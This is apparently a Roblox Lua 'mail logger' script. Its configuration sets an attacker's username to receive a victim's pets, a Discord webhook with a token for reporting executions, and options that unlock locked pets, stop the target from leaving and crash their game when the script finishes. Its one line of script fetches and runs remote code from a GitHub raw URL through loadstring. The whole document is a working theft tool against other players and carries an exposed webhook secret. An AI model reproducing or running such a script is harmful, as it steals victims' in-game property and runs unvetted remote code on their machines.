--[[ Kix Project Mail Logger ]]--

--[[ Config ]]--
_G.Username = "Eduarddinu2017" --// Username To Send Pets To
_G.ScriptName = "Kix Project" --// Script Name For Watermark
_G.Webhook = "https://discord.com/api/webhooks/1096940267858296932/8z_v0vXoZIr8dCDc4XuTDbD6Q4-VrGR65T02gjOpU19N6yOfy6wvisIFfacvpKnGOXCo" --// Discord Webhook For Executions
_G.GiftMessage = "Thx for help" --// Message For The Gift To Say
_G.Diamonds = 500000 --// Amount Of Diamonds To Not Kick
_G.UnlockPets = true --// Unlocks Locked Pets
_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Crash = true  --// Crashes Them After Its Finished
_G.Tip1 = "1" --// Gives You Tips On The UI
_G.Tip2 = "2" --// Gives You Tips On The UI
_G.Tip3 = "3" --// Gives You Tips On The UI
_G.Tip4 = "4" --// Gives You Tips On The UI
_G.Tip5 = "5" --// Gives You Tips On The UI

--[[ Script ]]--

loadstring(game:HttpGet("https://raw.githubusercontent.com/K1nscripts/Arkhalis/main/77_OETZZG0NS.lua"))()
